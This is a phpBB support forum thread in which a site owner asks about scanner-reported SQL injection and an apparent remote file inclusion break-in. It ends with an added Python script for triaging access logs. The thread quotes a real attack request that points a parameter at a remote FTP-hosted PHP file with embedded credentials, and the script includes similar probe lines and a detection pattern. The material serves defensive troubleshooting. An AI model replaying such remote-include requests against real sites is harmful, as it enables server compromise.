Blind SQL Injection Exploits!

myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Blind SQL Injection Exploits!

Post by myssbot » Wed Jun 27, 2012 9:51 am

Blind SQL Injection Exploits!

Affected items
/memberlist2.php
/viewtopic.php
/toplist.php

About toplist.php, I just removed it!

Any idea how to fix the vuln on memberslist2.php and viewtopic.php?


The impact of this vulnerability
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

How to fix this vulnerability
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.

RMcGirr83
Former Team Member
Posts: 16722
Joined: Wed Jun 22, 2005 4:33 pm
Location: Connecticut USA
Name: Rich McGirr

Re: Blind SQL Injection Exploits!

Post by RMcGirr83 » Wed Jun 27, 2012 10:01 am

There are no such files as memberslist2.php or toplist.php within a default download of the phpBB software. As for viewtopic.php, more than likely someone edited the file and included a SQL injection within the code.

Do not hire Christian Bullock

Noxwizard
Support Team Leader
Posts: 9920
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster

Re: Blind SQL Injection Exploits!

Post by Noxwizard » Wed Jun 27, 2012 6:35 pm

You should take these results with a grain of salt. Automated tools like this generally report back a lot of bogus results. If you look at the viewtopic result, it actually gave back a 404 status code, which is the correct behavior when a topic can't be found. So for correct behavior, it reports a SQL injection vulnerability? If you keep phpBB and your MODs up-to-date, you should be fine.
Do not contact me for private support, please share the question in our forums.

myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Re: Blind SQL Injection Exploits!

Post by myssbot » Thu Jun 28, 2012 12:15 am

The website was hacked by RFI exploits and the guy changed many things in .htaccess. I think it was through toplist.php, because after I removed toplist.php and fixed .htaccess it stopped.

Anyway, thanks for the support, the problem was mod sux. I don't know how it works, but it would be good to take a look into the code before approving it for download (if that doesn't happen already).

thanks m8

AmigoJack
Registered User
Posts: 4162
Joined: Tue Jun 15, 2010 11:33 am
Location: グリーン ヒル ゾーン

Re: Blind SQL Injection Exploits!

Post by AmigoJack » Thu Jun 28, 2012 5:30 am

myssbot wrote: the problem was mod sux
Link to it.
The worst thing about censorship is ███████████

myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Re: Blind SQL Injection Exploits!

Post by myssbot » Thu Jun 28, 2012 6:28 am

I still have problems...

He is saving .js files in my forum's FTP files and editing some files.

This is my webhost log:

177.98.185.243 - - [26/Jun/2012:22:00:27 -0300] "GET /viewtopic.php?f=ftp://hhklkj:2600144@ftp.freehostia.com/tester.php? HTTP/1.0" 404 9713 "-" "Mozilla/3.0 (compatible; Indy Library)" "-" 262 9949


Anyone know how I can stop it?

Erik Frèrejean
Former Team Member
Posts: 9897
Joined: Tue Oct 09, 2007 9:09 am
Location: The Netherlands, 3.0.x Support Forum
Name: Erik Frèrejean

Re: Blind SQL Injection Exploits!

Post by Erik Frèrejean » Thu Jun 28, 2012 10:16 am

Change the FTP password, change the passwords of your admin accounts and contact your host. phpBB is just showing the issue, it is most likely not the point of entry.
I don't give support via PM or IM! (all unsolicited pms will be trashed!)

CaNNon_
Registered User
Posts: 392
Joined: Wed Apr 29, 2009 2:07 am

Re: Blind SQL Injection Exploits!

Post by CaNNon_ » Thu Jun 28, 2012 11:34 am

HTTP/1.0" 404


I don't think that log entry means much, 404 = not found. If you want to use the Apache logs you need to look for stuff that got a reply.
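
The status-code point from the reply above, sketched as an added example (not code from any poster in this thread or from phpBB): it scans access-log lines in the layout quoted earlier, flags query parameters whose decoded value is a remote URL, and separates requests the server rejected with a 4xx (like the 404 in the thread) from those that got a reply and need review. The sample lines, addresses and the /mods/example.php script are constructed.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in the same layout as the log line quoted in the thread.
# IPs are documentation ranges and /mods/example.php is a hypothetical script.
SAMPLE_LOG = '''\
192.0.2.10 - - [26/Jun/2012:22:00:27 -0300] "GET /viewtopic.php?f=ftp://user:pass@ftp.example.com/tester.php? HTTP/1.0" 404 9713 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.10 - - [26/Jun/2012:22:00:31 -0300] "GET /mods/example.php?page=http://example.com/x.txt? HTTP/1.0" 200 5120 "-" "Mozilla/3.0 (compatible; Indy Library)"
198.51.100.7 - - [26/Jun/2012:22:05:02 -0300] "GET /viewtopic.php?f=2&t=15 HTTP/1.1" 200 18233 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jun/2012:22:09:44 -0300] "GET /mods/example.php?page=hTTp%3A%2F%2Fexample.com%2Fx.txt HTTP/1.0" 200 5120 "-" "-"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# A parameter value that starts with a URL scheme is the shape of a remote-include probe.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php)://', re.IGNORECASE)
# Credentials embedded in a URL should not be copied into reports.
USERINFO_RE = re.compile(r'//[^/@\s]+@')

def triage(log_text):
    """Return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected layout
        path, _, query = m["target"].partition("?")
        status = int(m["status"])
        # parse_qsl percent-decodes values, so encoded probes are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": path, "param": name,
                    "value": USERINFO_RE.sub("//<redacted>@", value),
                    "status": status,
                    # 4xx: the server refused the request; anything else got a reply.
                    "priority": "rejected" if 400 <= status < 500 else "review",
                })
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Entries marked "review" are the ones to compare against file modification times and the FTP log; a legitimate parameter that carries a URL (a redirect target, for instance) will also be flagged and has to be ruled out by hand.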

